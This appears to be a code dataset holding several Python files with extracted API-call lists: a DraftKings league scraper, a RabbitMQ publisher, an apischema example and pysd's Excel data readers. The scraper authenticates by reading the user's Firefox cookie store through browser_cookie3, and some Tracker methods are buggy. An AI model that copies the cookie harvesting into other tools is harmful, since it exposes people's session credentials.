return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
# TODO: this may same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
ws = pdsheet.get_worksheet(self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
headers = rng.get_values()[0]
self._colmap = {user:idx for idx, user in enumerate(headers)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
# get the sheet
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
# figure out the last row
rng = s.get_data_range()
newrow_index = rng.coordinates.number_of_row + 1
# now loop through the results and add to sheet
colmap = self.column_map
for k,v in results.items():
colnum = colmap.get(k)
if colnum:
cell = s.get_range(newrow_index, colnum, 1, 1)
cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
ws = pdsheet.get_worksheet(app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| [
"logging.NullHandler",
"pdsheet.get_app",
"browser_cookie3.firefox",
"logging.getLogger",
"os.getenv",
"pdsheet.get_worksheet",
"requests_html.HTMLSession",
"pandas.DataFrame"
]
| [((724, 737), 'requests_html.HTMLSession', 'HTMLSession', ([], {}), '()\n', (735, 737), False, 'from requests_html import HTMLSession\n'), ((1310, 1335), 'browser_cookie3.firefox', 'browser_cookie3.firefox', ([], {}), '()\n', (1333, 1335), False, 'import browser_cookie3\n'), ((4779, 4802), 'pandas.DataFrame', 'pd.DataFrame', (['container'], {}), '(container)\n', (4791, 4802), True, 'import pandas as pd\n'), ((9238, 9269), 'pdsheet.get_app', 'pdsheet.get_app', (['json_secret_fn'], {}), '(json_secret_fn)\n', (9253, 9269), False, 'import pdsheet\n'), ((10047, 10085), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10068, 10085), False, 'import pdsheet\n'), ((10701, 10739), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['app', 'self.sskey'], {}), '(app, self.sskey)\n', (10722, 10739), False, 'import pdsheet\n'), ((526, 547), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (545, 547), False, 'import logging\n'), ((605, 631), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (614, 631), False, 'import os\n'), ((682, 706), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (691, 706), False, 'import os\n'), ((4496, 4517), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (4515, 4517), False, 'import logging\n'), ((4575, 4601), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_KEY"""'], {}), "('DK_LEAGUE_KEY')\n", (4584, 4601), False, 'import os\n'), ((4652, 4676), 'os.getenv', 'os.getenv', (['"""DK_USERNAME"""'], {}), "('DK_USERNAME')\n", (4661, 4676), False, 'import os\n'), ((9168, 9189), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (9187, 9189), False, 'import logging\n'), ((9311, 9345), 'os.getenv', 'os.getenv', (['"""DK_LEAGUE_SPREADSHEET"""'], {}), "('DK_LEAGUE_SPREADSHEET')\n", (9320, 9345), False, 'import os\n'), ((9536, 9569), 'pdsheet.get_worksheet', 'pdsheet.get_worksheet', (['self.sskey'], {}), '(self.sskey)\n', (9557, 9569), False, 'import pdsheet\n'), ((487, 514), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (504, 514), False, 'import logging\n'), ((4457, 4484), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (4474, 4484), False, 'import logging\n'), ((9129, 9156), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (9146, 9156), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
"""
Created on Mon Oct 21 08:47:08 2019
@author: dordoloy
"""
import os
import pika
import config
import getpass
def publish_fanout():
amqp_url=config.amqp_url
# Parse CLODUAMQP_URL (fallback to localhost)
url = os.environ.get('CLOUDAMQP_URL',amqp_url)
params = pika.URLParameters(url)
params.socket_timeout = 5
connection = pika.BlockingConnection(params) # Connect to CloudAMQP
properties = pika.BasicProperties()
channel = connection.channel()
channel.exchange_declare(exchange='posts',
exchange_type='fanout')
channel.basic_publish(exchange='posts',
routing_key='',
body='message')
print("send")
publish_fanout() | [
"pika.BasicProperties",
"pika.URLParameters",
"pika.BlockingConnection",
"os.environ.get"
]
| [((262, 303), 'os.environ.get', 'os.environ.get', (['"""CLOUDAMQP_URL"""', 'amqp_url'], {}), "('CLOUDAMQP_URL', amqp_url)\n", (276, 303), False, 'import os\n'), ((316, 339), 'pika.URLParameters', 'pika.URLParameters', (['url'], {}), '(url)\n', (334, 339), False, 'import pika\n'), ((392, 423), 'pika.BlockingConnection', 'pika.BlockingConnection', (['params'], {}), '(params)\n', (415, 423), False, 'import pika\n'), ((469, 491), 'pika.BasicProperties', 'pika.BasicProperties', ([], {}), '()\n', (489, 491), False, 'import pika\n')] |
from dataclasses import dataclass
from apischema import deserialize, deserializer
from apischema.json_schema import deserialization_schema
@dataclass
class Expression:
value: int
@deserializer
def evaluate_expression(expr: str) -> Expression:
return Expression(int(eval(expr)))
# Could be shorten into deserializer(Expression), because class is callable too
@deserializer
def expression_from_value(value: int) -> Expression:
return Expression(value)
assert deserialization_schema(Expression) == {
"$schema": "http://json-schema.org/draft/2019-09/schema#",
"type": ["string", "integer"],
}
assert deserialize(Expression, 0) == deserialize(Expression, "1 - 1") == Expression(0)
| [
"apischema.json_schema.deserialization_schema",
"apischema.deserialize"
]
| [((478, 512), 'apischema.json_schema.deserialization_schema', 'deserialization_schema', (['Expression'], {}), '(Expression)\n', (500, 512), False, 'from apischema.json_schema import deserialization_schema\n'), ((625, 651), 'apischema.deserialize', 'deserialize', (['Expression', '(0)'], {}), '(Expression, 0)\n', (636, 651), False, 'from apischema import deserialize, deserializer\n'), ((655, 687), 'apischema.deserialize', 'deserialize', (['Expression', '"""1 - 1"""'], {}), "(Expression, '1 - 1')\n", (666, 687), False, 'from apischema import deserialize, deserializer\n')] |
"""
These classes are a collection of the needed tools to read external data.
The External type objects created by these classes are initialized before
the Stateful objects by functions.Model.initialize.
"""
import re
import os
import warnings
import pandas as pd # TODO move to openpyxl
import numpy as np
import xarray as xr
from openpyxl import load_workbook
from . import utils
class Excels():
"""
Class to save the read Excel files and thus avoid double reading
"""
_Excels, _Excels_opyxl = {}, {}
@classmethod
def read(cls, file_name, sheet_name):
"""
Read the Excel file or return the previously read one
"""
if file_name + sheet_name in cls._Excels:
return cls._Excels[file_name + sheet_name]
else:
excel = np.array([
pd.to_numeric(ex, errors='coerce')
for ex in
pd.read_excel(file_name, sheet_name, header=None).values
])
cls._Excels[file_name + sheet_name] = excel
return excel
@classmethod
def read_opyxl(cls, file_name):
"""
Read the Excel file using OpenPyXL or return the previously read one
"""
if file_name in cls._Excels_opyxl:
return cls._Excels_opyxl[file_name]
else:
excel = load_workbook(file_name, read_only=True, data_only=True)
cls._Excels_opyxl[file_name] = excel
return excel
@classmethod
def clean(cls):
"""
Clean the dictionary of read files
"""
cls._Excels, cls._Excels_opyxl = {}, {}
class External(object):
"""
Main class of external objects
Attributes
----------
py_name: str
The python name of the object
missing: str ("warning", "error", "ignore", "keep")
What to do with missing values. If "warning" (default)
shows a warning message and interpolates the values.
If "raise" raises an error. If "ignore" interpolates
the values without showing anything. If "keep" it will keep
the missing values, this option may cause the integration to
fail, but it may be used to check the quality of the data.
file: str
File name from which the data is read.
sheet: str
Sheet name from which the data is read.
"""
missing = "warning"
def __init__(self, py_name):
self.py_name = py_name
self.file = None
self.sheet = None
def __str__(self):
return self.py_name
def _get_data_from_file(self, rows, cols):
"""
Function to read data from excel file using rows and columns
Parameters
----------
rows: list of len 2
first row and last row+1 to be read, starting from 0
cols: list of len 2
first col and last col+1 to be read, starting from 0
Returns
-------
data: pandas.DataFrame, pandas.Series or float
depending on the shape of the requested data
"""
# TODO move to openpyxl to avoid pandas dependency in this file.
ext = os.path.splitext(self.file)[1].lower()
if ext in ['.xls', '.xlsx']:
# read data
data = Excels.read(
self.file,
self.sheet)[rows[0]:rows[1], cols[0]:cols[1]].copy()
shape = data.shape
# if it is a single row remove its dimension
if shape[1] == 1:
data = data[:, 0]
if shape[0] == 1:
data = data[0]
return data
raise NotImplementedError(self.py_name + "\n"
+ "The files with extension "
+ ext + " are not implemented")
def _get_data_from_file_opyxl(self, cellname):
"""
Function to read data from excel file using cell range name
Parameters
----------
cellname: str
the cell range name
Returns
-------
data: numpy.ndarray or float
depending on the shape of the requested data
"""
# read data
excel = Excels.read_opyxl(self.file)
try:
# Get the local id of the sheet
# needed for searching in locals names
# need to lower the sheetnames as Vensim has no case sensitivity
sheetId = [sheetname_wb.lower() for sheetname_wb
in excel.sheetnames].index(self.sheet.lower())
except ValueError:
# Error if it is not able to get the localSheetId
raise ValueError(self.py_name + "\n"
+ "The sheet doesn't exist...\n"
+ self._file_sheet)
try:
# Search for local and global names
cellrange = excel.defined_names.get(cellname, sheetId)\
or excel.defined_names.get(cellname)
coordinates = cellrange.destinations
for sheet, cells in coordinates:
if sheet.lower() == self.sheet.lower():
values = excel[sheet][cells]
try:
return np.array(
[[i.value if not isinstance(i.value, str)
else np.nan for i in j] for j in values],
dtype=float)
except TypeError:
return float(values.value)
raise AttributeError
except (KeyError, AttributeError):
# key error if the cellrange doesn't exist in the file or sheet
raise AttributeError(
self.py_name + "\n"
+ "The cell range name:\t {}\n".format(cellname)
+ "Doesn't exist in:\n" + self._file_sheet
)
def _get_series_data(self, series_across, series_row_or_col, cell, size):
"""
Function thar reads series and data from excel file for
DATA and LOOKUPS.
Parameters
----------
series_across: "row", "column" or "name"
The way to read series file.
series_row_or_col: int or str
If series_across is "row" the row number where the series data is.
If series_across is "column" the column name where
the series data is.
If series_across is "name" the cell range name where
the series data is.
cell:
If series_across is not "name, the top left cell where
the data table starts.
Else the name of the cell range where the data is.
size:
The size of the 2nd dimension of the data.
Returns
-------
series, data: ndarray (1D), ndarray(1D/2D)
The values of the series and data.
"""
if series_across == "row":
# Horizontal data (dimension values in a row)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series = self._get_data_from_file(
rows=[int(series_row_or_col)-1, int(series_row_or_col)],
cols=[first_col, None])
# read data
data = self._get_data_from_file(
rows=[first_row, first_row + size],
cols=[first_col, None]).transpose()
elif series_across == "column":
# Vertical data (dimension values in a column)
# get the dimension values
first_row, first_col = self._split_excel_cell(cell)
series_col = self._col_to_num(series_row_or_col)
series = self._get_data_from_file(
rows=[first_row, None],
cols=[series_col, series_col+1])
# read data
data = self._get_data_from_file(
rows=[first_row, None],
cols=[first_col, first_col + size])
else:
# get series data
series = self._get_data_from_file_opyxl(series_row_or_col)
if isinstance(series, float):
series = np.array([[series]])
series_shape = series.shape
if series_shape[0] == 1:
# horizontal definition of lookup/time dimension
series = series[0]
transpose = True
elif series_shape[1] == 1:
# vertical definition of lookup/time dimension
series = series[:, 0]
transpose = False
else:
# Error if the lookup/time dimension is 2D
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\tDimentime_missingsion name:"
+ "\t{}\n".format(series_row_or_col)
+ " is a table and not a vector"
)
# get data
data = self._get_data_from_file_opyxl(cell)
if isinstance(data, float):
data = np.array([[data]])
if transpose:
# transpose for horizontal definition of dimension
data = data.transpose()
if data.shape[0] != len(series):
raise ValueError(
self.py_name + "\n"
+ "Dimension and data given in:\n"
+ self._file_sheet
+ "\tDimension name:\t{}\n".format(series_row_or_col)
+ "\tData name:\t{}\n".format(cell)
+ " don't have the same length in the 1st dimension"
)
if data.shape[1] != size:
# Given coordinates length is different than
# the lentgh of 2nd dimension
raise ValueError(
self.py_name + "\n"
+ "Data given in:\n"
+ self._file_sheet
+ "\tData name:\t{}\n".format(cell)
+ " has not the same size as the given coordinates"
)
if data.shape[1] == 1:
# remove second dimension of data if its shape is (N, 1)
data = data[:, 0]
return series, data
def _resolve_file(self, root=None, possible_ext=None):
possible_ext = possible_ext or\
['', '.xls', '.xlsx', '.odt', '.txt', '.tab']
if self.file[0] == '?':
self.file = os.path.join(root, self.file[1:])
if not os.path.isfile(self.file):
for ext in possible_ext:
if os.path.isfile(self.file + ext):
self.file = self.file + ext
return
# raise FileNotFoundError(self.file)
# python2 compatibility
raise IOError("File Not Found: " + self.file)
else:
return
def _initialize_data(self, element_type):
"""
Initialize one element of DATA or LOOKUPS
Parameters
----------
element_type: str
"lookup" for LOOKUPS, "data" for data.
Returns
-------
data: xarray.DataArray
Dataarray with the time or interpolation dimension
as first dimension.
"""
self._resolve_file(root=self.root)
series_across = self._series_selector(self.x_row_or_col, self.cell)
size = utils.compute_shape(self.coords, reshape_len=1,
py_name=self.py_name)[0]
series, data = self._get_series_data(
series_across=series_across,
series_row_or_col=self.x_row_or_col,
cell=self.cell, size=size
)
# remove nan or missing values from dimension
if series_across != "name":
# Remove last nans only if the method is to read by row or col
i = 0
try:
while np.isnan(series[i-1]):
i -= 1
except IndexError:
# series has len 0
raise ValueError(
self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " has length 0"
)
if i != 0:
series = series[:i]
data = data[:i]
# warning/error if missing data in the series
if any(np.isnan(series)) and self.missing != "keep":
valid_values = ~np.isnan(series)
series = series[valid_values]
data = data[valid_values]
if self.missing == "warning":
warnings.warn(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " the corresponding data value(s) to the "
+ "missing/non-valid value(s) will be ignored\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Dimension value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
)
# Check if the lookup/time dimension is strictly monotonous
if np.any(np.diff(series) <= 0) and self.missing != "keep":
raise ValueError(self.py_name + "\n"
+ "Dimension given in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(series_across, self.x_row_or_col)
+ " is not strictly monotonous")
# Check for missing values in data
if np.any(np.isnan(data)) and self.missing != "keep":
if series_across == "name":
cell_type = "Cellrange"
else:
cell_type = "Reference cell"
if self.missing == "warning":
# Fill missing values with the chosen interpolation method
# what Vensim does during running for DATA
warnings.warn(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
+ " the corresponding value will be filled "
+ "with the interpolation method of the object.\n\n"
)
elif self.missing == "raise":
raise ValueError(
self.py_name + "\n"
+ "Data value missing or non-valid in:\n"
+ self._file_sheet
+ "\t{}:\t{}\n".format(cell_type, self.cell)
)
# fill values
self._fill_missing(series, data)
reshape_dims = tuple([len(series)] + utils.compute_shape(self.coords))
if len(reshape_dims) > 1:
data = self._reshape(data, reshape_dims)
if element_type == "lookup":
dim_name = "lookup_dim"
else:
dim_name = "time"
data = xr.DataArray(
data=data,
coords={dim_name: series, **self.coords},
dims=[dim_name] + list(self.coords)
)
return data
def _fill_missing(self, series, data):
"""
Fills missing values in excel read data. Mutates the values in data.
Parameters
----------
series:
the time series without missing values
data:
the data with missing values
Returns
-------
None
"""
# if data is 2dims we need to interpolate
datanan = np.isnan(data)
if len(data.shape) == 1:
data[datanan] = self._interpolate_missing(
series[datanan],
series[~datanan],
data[~datanan])
else:
for i, nanlist in enumerate(list(datanan.transpose())):
data[nanlist, i] = self._interpolate_missing(
series[nanlist],
series[~nanlist],
data[~nanlist][:, i])
def _interpolate_missing(self, x, xr, yr):
"""
Interpolates a list of missing values from _fill_missing
Parameters
----------
x:
list of missing values interpolate
xr:
non-missing x values
yr:
non-missing y values
Returns
-------
y:
Result after interpolating x with self.interp method
"""
y = np.empty_like(x, dtype=float)
for i, value in enumerate(x):
if self.interp == "raw":
y[i] = np.nan
elif value >= xr[-1]:
y[i] = yr[-1]
elif value <= xr[0]:
y[i] = yr[0]
elif self.interp == 'look forward':
y[i] = yr[xr >= value][0]
elif self.interp == 'hold backward':
y[i] = yr[xr <= value][-1]
else:
y[i] = np.interp(value, xr, yr)
return y
@property
def _file_sheet(self):
"""
Returns file and sheet name in a string
"""
return "\tFile name:\t{}\n".format(self.file)\
+ "\tSheet name:\t{}\n".format(self.sheet)
@staticmethod
def _col_to_num(col):
"""
Transforms the column name to int
Parameters
----------
col: str
Column name
Returns
-------
int
Column number
"""
if len(col) == 1:
return ord(col.upper()) - ord('A')
elif len(col) == 2:
left = ord(col[0].upper()) - ord('A') + 1
right = ord(col[1].upper()) - ord('A')
return left * (ord('Z')-ord('A')+1) + right
else:
left = ord(col[0].upper()) - ord('A') + 1
center = ord(col[1].upper()) - ord('A') + 1
right = ord(col[2].upper()) - ord('A')
return left * ((ord('Z')-ord('A')+1)**2)\
+ center * (ord('Z')-ord('A')+1)\
+ right
def _split_excel_cell(self, cell):
"""
Splits a cell value given in a string.
Returns None for non-valid cell formats.
Parameters
----------
cell: str
Cell like string, such as "A1", "b16", "AC19"...
If it is not a cell like string will return None.
Returns
-------
row number, column number: int, int
If the cell input is valid. Both numbers are given in Python
enumeration, i.e., first row and first column are 0.
"""
split = re.findall(r'\d+|\D+', cell)
try:
# check that we only have two values [column, row]
assert len(split) == 2
# check that the column name has no special characters
assert not re.compile('[^a-zA-Z]+').search(split[0])
# check that row number is not 0
assert int(split[1]) != 0
# the column name has as maximum 3 letters
assert len(split[0]) <= 3
return int(split[1])-1, self._col_to_num(split[0])
except AssertionError:
return
@staticmethod
def _reshape(data, dims):
"""
Reshapes an pandas.DataFrame, pandas.Series, xarray.DataArray
or np.ndarray in the given dimensions.
Parameters
----------
data: xarray.DataArray/numpy.ndarray
Data to be reshaped
dims: tuple
The dimensions to reshape.
Returns
-------
numpy.ndarray
reshaped array
"""
try:
data = data.values
except AttributeError:
pass
return data.reshape(dims)
def _series_selector(self, x_row_or_col, cell):
"""
Selects if a series data (DATA/LOOKUPS), should be read by columns,
rows or cellrange name.
Based on the input format of x_row_or_col and cell.
The format of the 2 variables must be consistent.
Parameters
----------
x_row_or_col: str
String of a number if series is given in a row, letter if series is
given in a column or name if the series is given by cellrange name.
cell: str
Cell identificator, such as "A1", or name if the data is given
by cellrange name.
Returns
-------
series_across: str
"row" if series is given in a row
"column" if series is given in a column
"name" if series and data are given by range name
"""
try:
# if x_row_or_col is numeric the series must be a row
int(x_row_or_col)
return "row"
except ValueError:
if self._split_excel_cell(cell):
# if the cell can be splitted means that the format is
# "A1" like then the series must be a column
return "column"
else:
return "name"
class ExtData(External):
"""
Class for Vensim GET XLS DATA/GET DIRECT DATA
"""
def __init__(self, file_name, sheet, time_row_or_col, cell,
interp, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.time_row_or_cols = [time_row_or_col]
self.cells = [cell]
self.coordss = [coords]
self.root = root
self.interp = interp
# check if the interpolation method is valid
if not interp:
self.interp = "interpolate"
if self.interp not in ["interpolate", "raw",
"look forward", "hold backward"]:
raise ValueError(self.py_name + "\n"
+ " The interpolation method (interp) must be "
+ "'raw', 'interpolate', "
+ "'look forward' or 'hold backward")
def add(self, file_name, sheet, time_row_or_col, cell,
interp, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.time_row_or_cols.append(time_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if not interp:
interp = "interpolate"
if interp != self.interp:
raise ValueError(self.py_name + "\n"
+ "Error matching interpolation method with "
+ "previously defined one")
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.time_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("data"))
self.data = utils.xrmerge(data)
def __call__(self, time):
if time in self.data['time'].values:
outdata = self.data.sel(time=time)
elif self.interp == "raw":
return np.nan
elif time > self.data['time'].values[-1]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the time")
outdata = self.data[-1]
elif time < self.data['time'].values[0]:
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the time")
outdata = self.data[0]
elif self.interp == "interpolate":
outdata = self.data.interp(time=time)
elif self.interp == 'look forward':
outdata = self.data.sel(time=time, method="backfill")
elif self.interp == 'hold backward':
outdata = self.data.sel(time=time, method="pad")
if self.coordss[0]:
# Remove time coord from the DataArray
return outdata.reset_coords('time', drop=True)
else:
# if data has no-coords return a float
return float(outdata)
class ExtLookup(External):
"""
Class for Vensim GET XLS LOOKUPS/GET DIRECT LOOKUPS
"""
def __init__(self, file_name, sheet, x_row_or_col, cell,
coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.x_row_or_cols = [x_row_or_col]
self.cells = [cell]
self.root = root
self.coordss = [coords]
self.interp = "interpolate"
def add(self, file_name, sheet, x_row_or_col, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.x_row_or_cols.append(x_row_or_col)
self.cells.append(cell)
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.x_row_or_cols,
self.cells, self.coordss)
for (self.file, self.sheet, self.x_row_or_col,
self.cell, self.coords) in zipped:
data.append(self._initialize_data("lookup"))
self.data = utils.xrmerge(data)
def __call__(self, x):
return self._call(self.data, x)
def _call(self, data, x):
if isinstance(x, xr.DataArray):
if not x.dims:
# shape 0 xarrays
return self._call(data, float(x))
if np.all(x > data['lookup_dim'].values[-1]):
outdata, _ = xr.broadcast(data[-1], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif np.all(x < data['lookup_dim'].values[0]):
outdata, _ = xr.broadcast(data[0], x)
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
data, _ = xr.broadcast(data, x)
outdata = data[0].copy()
for a in utils.xrsplit(x):
outdata.loc[a.coords] = self._call(data.loc[a.coords],
float(a))
# the output will be always an xarray
return outdata.reset_coords('lookup_dim', drop=True)
else:
if x in data['lookup_dim'].values:
outdata = data.sel(lookup_dim=x)
elif x > data['lookup_dim'].values[-1]:
outdata = data[-1]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data above the maximum value of the series")
elif x < data['lookup_dim'].values[0]:
outdata = data[0]
warnings.warn(
self.py_name + "\n"
+ "extrapolating data below the minimum value of the series")
else:
outdata = data.interp(lookup_dim=x)
# the output could be a float or an xarray
if self.coordss[0]:
# Remove lookup dimension coord from the DataArray
return outdata.reset_coords('lookup_dim', drop=True)
else:
# if lookup has no-coords return a float
return float(outdata)
class ExtConstant(External):
"""
Class for Vensim GET XLS CONSTANTS/GET DIRECT CONSTANTS
"""
def __init__(self, file_name, sheet, cell, coords, root, py_name):
super().__init__(py_name)
self.files = [file_name]
self.sheets = [sheet]
self.transposes = [cell[-1] == '*']
self.cells = [cell.strip('*')]
self.root = root
self.coordss = [coords]
def add(self, file_name, sheet, cell, coords):
"""
Add information to retrieve new dimension in an already declared object
"""
self.files.append(file_name)
self.sheets.append(sheet)
self.transposes.append(cell[-1] == '*')
self.cells.append(cell.strip('*'))
self.coordss.append(coords)
if list(coords) != list(self.coordss[0]):
raise ValueError(self.py_name + "\n"
+ "Error matching dimensions with previous data")
def initialize(self):
"""
Initialize all elements and create the self.data xarray.DataArray
"""
data = []
zipped = zip(self.files, self.sheets, self.transposes,
self.cells, self.coordss)
for (self.file, self.sheet, self.transpose,
self.cell, self.coords) in zipped:
data.append(self._initialize())
self.data = utils.xrmerge(data)
def _initialize(self):
"""
Initialize one element
"""
self._resolve_file(root=self.root)
split = self._split_excel_cell(self.cell)
if split:
data_across = "cell"
cell = split
else:
data_across = "name"
cell = self.cell
shape = utils.compute_shape(self.coords, reshape_len=2,
py_name=self.py_name)
if self.transpose:
shape.reverse()
data = self._get_constant_data(data_across, cell, shape)
if self.transpose:
data = data.transpose()
if np.any(np.isnan(data)):
# nan values in data
